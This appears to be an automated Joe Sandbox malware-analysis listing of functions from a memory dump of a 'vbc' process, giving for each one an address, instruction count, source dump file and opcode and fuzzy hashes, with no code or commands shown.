                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                                                                  • Instruction ID: dd2c4ced086b64b6b0926ff5d90350d61e1201febd46e9266362c120ec8360cd
                                                                                                                                                  • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                                                                  • Instruction Fuzzy Hash: 2631AB31600648EFDB21DFA9C889F6AB7F9FF44354F1449A9E5529B290E730EE41CB50
                                                                                                                                                  Function 05C48D59 Relevance: .1, Instructions: 83COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 771e0484a404b195372877301509bf43f816fb0c262265de74eede4d8511304c
                                                                                                                                                  • Instruction ID: a3c17dcf6fbe7f4d696cd7781a7be32f356baaca0e97a3491187a79fa76992eb
                                                                                                                                                  • Opcode Fuzzy Hash: 771e0484a404b195372877301509bf43f816fb0c262265de74eede4d8511304c
                                                                                                                                                  • Instruction Fuzzy Hash: 0C2136377016929BD729DB79C908F357BA6FF40798F090CA4DD02876D1E368DD40C614
                                                                                                                                                  Function 05CC06F1 Relevance: .1, Instructions: 79COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 070b27ed33bf6fbc9b20eaf773b49b689cdfa2d1ab58807d6ed5400ff4a70ba8
                                                                                                                                                  • Instruction ID: 304298c451e0043556b11e462859578b6b6d3411e882d94a314bcd5a0bbbcad7
                                                                                                                                                  • Opcode Fuzzy Hash: 070b27ed33bf6fbc9b20eaf773b49b689cdfa2d1ab58807d6ed5400ff4a70ba8
                                                                                                                                                  • Instruction Fuzzy Hash: 57219171A00229DBCF15DF59C885ABEBBF4FF48744B54046AF841B7240D778AD51DBA0
                                                                                                                                                  Function 05CC019F Relevance: .1, Instructions: 78COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 376cf689a71d7a4c7b9feb165f387c3a76090ec38be810c4313775a7ee402540
                                                                                                                                                  • Instruction ID: 60b02165022993571ad026921beb005765964c0f016486e7992abc4667efa10b
                                                                                                                                                  • Opcode Fuzzy Hash: 376cf689a71d7a4c7b9feb165f387c3a76090ec38be810c4313775a7ee402540
                                                                                                                                                  • Instruction Fuzzy Hash: 91218B71600644EFC715DFA8D848A6ABBB8FF48790F1408A9F905E7690D638ED40CBA8
                                                                                                                                                  Function 05CC0283 Relevance: .1, Instructions: 74COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 5863df05514a3b1de3a0ac157c8c43211b28deca8270a3c9d1f6271c03d63214
                                                                                                                                                  • Instruction ID: 24c49dac2ebd7ba0e3d10c6be377688f5cf8c6fb285479427dea05eb1130377f
                                                                                                                                                  • Opcode Fuzzy Hash: 5863df05514a3b1de3a0ac157c8c43211b28deca8270a3c9d1f6271c03d63214
                                                                                                                                                  • Instruction Fuzzy Hash: 7E219072A08285DBC711DF99C84CB6FBBECAF81650F080C9AFC819B251D734DA45D6A5
                                                                                                                                                  Function 05C46C50 Relevance: .1, Instructions: 73COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: e8ccae6e2f7e35f84e7bb989f2678c939a5afa5094da6a1dc038476e0161c08b
                                                                                                                                                  • Instruction ID: f4dfc525d6de4ce095578f90c87e888c53f413c9000c28f8e24a3809871f5884
                                                                                                                                                  • Opcode Fuzzy Hash: e8ccae6e2f7e35f84e7bb989f2678c939a5afa5094da6a1dc038476e0161c08b
                                                                                                                                                  • Instruction Fuzzy Hash: 4B318D76604601CFC720CF69C180F26BBE5FB48714F2888ADE94A8B755DB31E942CF90
                                                                                                                                                  Function 05CFA49A Relevance: .1, Instructions: 70COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: a12e9d3b53d348922bd15b3089679a6f56faccfe3aab937272952e5274a4574c
                                                                                                                                                  • Instruction ID: 48eb1564271f5965ba0f28bca6efe218d2c2908b43a2bc9d498c316a0951cae5
                                                                                                                                                  • Opcode Fuzzy Hash: a12e9d3b53d348922bd15b3089679a6f56faccfe3aab937272952e5274a4574c
                                                                                                                                                  • Instruction Fuzzy Hash: 57113A32390F147FE36255589C05F27FA9ADBC4B20F200C24B70CDB280DA70DC009795
                                                                                                                                                  Function 05C7A30B Relevance: .1, Instructions: 70COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 3eea8d2a41627a2702678e24dcd4bb973144f163644dbab69603334bada9d95a
                                                                                                                                                  • Instruction ID: 2de0e8e3aee700675b1bd8229841304ee3334721c5af5c3c0dbc1ac2f9392ea6
                                                                                                                                                  • Opcode Fuzzy Hash: 3eea8d2a41627a2702678e24dcd4bb973144f163644dbab69603334bada9d95a
                                                                                                                                                  • Instruction Fuzzy Hash: 5821CF35200640AFC725DF69CC01B5677F5FF08B44F248869A409CBB61E335E982CF98
                                                                                                                                                  Function 05CD80A8 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                                                                  • Instruction ID: beaa2f8dc883e23740464ce3003c0f58c056f0ecbfe6623c76786594a962cd45
                                                                                                                                                  • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                                                                  • Instruction Fuzzy Hash: 0B216D72A00209AFDB129F98CC44FAEBBBAEF48360F200859FA01E7250D774D9509B60
                                                                                                                                                  Function 05C48770 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 4595c80ef210ccd217e3b8b90c88f00f6325ee4d2ad5d2af99f18e67937333ad
                                                                                                                                                  • Instruction ID: 94b4c64f2134a4334488a7e2289169e5de4291e27422446cf13f4eb72fd0742b
                                                                                                                                                  • Opcode Fuzzy Hash: 4595c80ef210ccd217e3b8b90c88f00f6325ee4d2ad5d2af99f18e67937333ad
                                                                                                                                                  • Instruction Fuzzy Hash: AE116D357056119BCB11CF49C590E67B7FAFF4A750B198469FD09AF204D6B2DA01CBA0
                                                                                                                                                  Function 05C70124 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                                                                  • Instruction ID: 3438d21af53c82e80a8be2cbb433458fbcc16242633a48c47dcab8578939afc5
                                                                                                                                                  • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                                                                  • Instruction Fuzzy Hash: 93110473600608BFD7229F84CC49FABB7B9EB80754F100829F601AB580D6B1EE44DB50
                                                                                                                                                  Function 05CE4F42 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 7c72c45912d47683c52433c96848dfb8decf3587e712a2c85a6b68d0e49ae640
                                                                                                                                                  • Instruction ID: 1607a201f514a67ae084ebc06616b2ace63d786b3594d474f9812486a399cd6e
                                                                                                                                                  • Opcode Fuzzy Hash: 7c72c45912d47683c52433c96848dfb8decf3587e712a2c85a6b68d0e49ae640
                                                                                                                                                  • Instruction Fuzzy Hash: 0D215E75A00219AFCB05CF88C880DAEBBB9FF58754B1144A9E805AB351DA71AE41CBA0
                                                                                                                                                  Function 05C480E9 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2d7625d75cd50ba111e5a682b3e2804d5aeaf10c8266481feedf513f64105052
                                                                                                                                                  • Instruction ID: 297fd42464b6632c03a8adb94f36b5c78e4d279831b408a04248958e30803183
                                                                                                                                                  • Opcode Fuzzy Hash: 2d7625d75cd50ba111e5a682b3e2804d5aeaf10c8266481feedf513f64105052
                                                                                                                                                  • Instruction Fuzzy Hash: 7F215B75A00205DFCB14CF99C581AAEBBB6FB88718F24456ED505AB350CB71AE46CF90
                                                                                                                                                  Function 05C7674D Relevance: .1, Instructions: 65COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 32d85e4941be696660eec96e53a21a6eb33fc7cd1a8f41f80157559831c87a34
                                                                                                                                                  • Instruction ID: de8e67436477b3cfa553c9be0700dcebaa62419dd444a4a32426df4098c7fdab
                                                                                                                                                  • Opcode Fuzzy Hash: 32d85e4941be696660eec96e53a21a6eb33fc7cd1a8f41f80157559831c87a34
                                                                                                                                                  • Instruction Fuzzy Hash: 56216A71614A04EFC720DF69C881F66B3F9FB44390F448C6DE4AAC7A50DA70A980CBA0
                                                                                                                                                  Function 05C766B0 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: d749146d65b55d304c84beaf4f1ac0e286ed94293e6749652d4d1180a6a0959f
                                                                                                                                                  • Instruction ID: 7fdfbb26d62775ecfab79dfd1ff945927fceb9c37d938fcb5fd5fdf8d6474101
                                                                                                                                                  • Opcode Fuzzy Hash: d749146d65b55d304c84beaf4f1ac0e286ed94293e6749652d4d1180a6a0959f
                                                                                                                                                  • Instruction Fuzzy Hash: CA11E376A01648EFCB25CF99C580E5ABBF5EF84790B1184BAE9059B710DB30DE80CB94
                                                                                                                                                  Function 05C42F12 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 99dd510900b107a29eaf74a84ffa599d6a4167e62bbdf165f25f23eae9302140
                                                                                                                                                  • Instruction ID: b759f99bcd5e30978ec8e0c125e9d61c642686eac6fc56290ce9ae32fd25b31a
                                                                                                                                                  • Opcode Fuzzy Hash: 99dd510900b107a29eaf74a84ffa599d6a4167e62bbdf165f25f23eae9302140
                                                                                                                                                  • Instruction Fuzzy Hash: A4110C7D3083206BE721671EDC87F26BED5EB40A90FD80827F50597790D9B0D804EEA5
                                                                                                                                                  Function 05CCE7E1 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                                                                  • Instruction ID: d62fe816315ab99324dd851b562e2ad59f6eb6c3cca2f0a065787db71d15ceca
                                                                                                                                                  • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                                                                  • Instruction Fuzzy Hash: 5C119131605604EFEB22DF49C844F5A7BAEFB46754F058CACE9099B250D771DD40DB90
                                                                                                                                                  Function 05C627ED Relevance: .1, Instructions: 58COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 1d540e95b0914d28b4c619ff61b0288f05f0d3a9d34ab142fae1a8bc19f89d5b
                                                                                                                                                  • Instruction ID: fa1fba5723756f56bf224f9889d302ace5e15f1345e3c17d742c0efde435a125
                                                                                                                                                  • Opcode Fuzzy Hash: 1d540e95b0914d28b4c619ff61b0288f05f0d3a9d34ab142fae1a8bc19f89d5b
                                                                                                                                                  • Instruction Fuzzy Hash: 07012B3770A685AFE316966EDC88F276B9DFF44798F050C65F80187141D514DD00C2B1
                                                                                                                                                  Function 05C44690 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 7b0ef4ff8b4bcc63e71d33192bda34c454c54b373d043698cc72bd5bb31afab5
                                                                                                                                                  • Instruction ID: 8cb41a3cd35f285848129470ad389a8cf6a74498d7dcdebc60403de20128bac7
                                                                                                                                                  • Opcode Fuzzy Hash: 7b0ef4ff8b4bcc63e71d33192bda34c454c54b373d043698cc72bd5bb31afab5
                                                                                                                                                  • Instruction Fuzzy Hash: AE11B836245640AFCB29CF59D884F577BB9EB86A64F24492AF8048B240C774E941DFA0
                                                                                                                                                  Function 05C76620 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 64b7b3bae0640ee463ce06485fb1907c1b7c3eaee141b0662bcc67784f42fa7a
                                                                                                                                                  • Instruction ID: a51cf732660dee6bf49c3277a4832f5cf77b462bdda295e89edbd867923d81fe
                                                                                                                                                  • Opcode Fuzzy Hash: 64b7b3bae0640ee463ce06485fb1907c1b7c3eaee141b0662bcc67784f42fa7a
                                                                                                                                                  • Instruction Fuzzy Hash: B3118276A00B19ABCB21DF69D980F5EFBB8FF44790F900859D906B7600D730AE819B64
                                                                                                                                                  Function 05C6E53E Relevance: .1, Instructions: 55COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                                                  • Instruction ID: 15a7ddb90413f68e79ff37d4cda85724e24570f4a7b3f486fe024ef9e4f55e77
                                                                                                                                                  • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                                                  • Instruction Fuzzy Hash: 3711293A2056C29BD7228B69C484B667BA9FB00798F090CA5ED4287641F338CA42C254
                                                                                                                                                  Function 05CCE75D Relevance: .1, Instructions: 54COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                                                                  • Instruction ID: 2892140bf56d9f2d578b7a8f68f0289f8af56b01344ee6fb95d51e73d52246ee
                                                                                                                                                  • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                                                                  • Instruction Fuzzy Hash: F201D232B04104AFDB239F55C804F5B7EBEFB42B50F0688A8E9069B260E771DE40DB90
                                                                                                                                                  Function 05C3A250 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                                                  • Instruction ID: 56b28dd241480824e87dc692c7454752e0b9bcd8754f46ab24b59d888f06347d
                                                                                                                                                  • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                                                  • Instruction Fuzzy Hash: 24010431504719ABCB309F159C41A367BA5FB457607008E2DFCD9CB680C336D560CBA0
                                                                                                                                                  Function 05CBE1D0 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 50f35812fd32aefad424c1fea29a728615ca3c944def5b40dd9564c02801ec14
                                                                                                                                                  • Instruction ID: bb1a3d149c3c2a432a4588be65f87d0d6d4eeebbe01684a2014747c89e84ab4e
                                                                                                                                                  • Opcode Fuzzy Hash: 50f35812fd32aefad424c1fea29a728615ca3c944def5b40dd9564c02801ec14
                                                                                                                                                  • Instruction Fuzzy Hash: B311AD32241240EFDB16EF59CD84F96BBB8FF48B94F240865F9059B662C375ED01DA90
                                                                                                                                                  Function 05C46259 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: e75a3d0b4ad52279ed9e722b77db3e878d27b9f400e8187933206e0104f84955
                                                                                                                                                  • Instruction ID: d084f3ff4a142b76976188f76c6e97bf9aaa2fe4070ae6a1e79b1e14e123bb87
                                                                                                                                                  • Opcode Fuzzy Hash: e75a3d0b4ad52279ed9e722b77db3e878d27b9f400e8187933206e0104f84955
                                                                                                                                                  • Instruction Fuzzy Hash: 45119A71602228ABDB25EB64CC4AFF9B3B4BB04714F5049D4A319A60E0DB709E81DF84
                                                                                                                                                  Function 05C36DF6 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 58a4fec0dcf06506bd7dc71b046983f0c4f300a8e51647a6b0b8bd2cc150bd7c
                                                                                                                                                  • Instruction ID: 6d5c849879dfc1adda40ae542acc52f345a2cd4598f5f3bfa3419e96dc224330
                                                                                                                                                  • Opcode Fuzzy Hash: 58a4fec0dcf06506bd7dc71b046983f0c4f300a8e51647a6b0b8bd2cc150bd7c
                                                                                                                                                  • Instruction Fuzzy Hash: 9601B135714602ABCF15AE69E849C67BBA6FF85310B00093DF94583651DF31EC54DAD1
                                                                                                                                                  Function 05C76DA0 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c0ec4d266471c9547166acc1fd1eb763428ac71706b94ce862d4cb5f0fc29682
                                                                                                                                                  • Instruction ID: cd5b545bafa5f6e2e8bf8ba03d54d8d818cda7cbf446a833d019fcdabce10556
                                                                                                                                                  • Opcode Fuzzy Hash: c0ec4d266471c9547166acc1fd1eb763428ac71706b94ce862d4cb5f0fc29682
                                                                                                                                                  • Instruction Fuzzy Hash: 3F014C7160851967DF2D9B95C808B9F7F69EB80B60F144859A9075B680D774DEC0C3F0
                                                                                                                                                  Function 05CD6500 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: e75280e390ba5d20d221833df3ed04030dbdcf24a5758f742e85bee5f82a2b35
                                                                                                                                                  • Instruction ID: 6cd406bd58329c82fd9f591dd64626e6bb40472682f4482709c564b0f8dcb9a2
                                                                                                                                                  • Opcode Fuzzy Hash: e75280e390ba5d20d221833df3ed04030dbdcf24a5758f742e85bee5f82a2b35
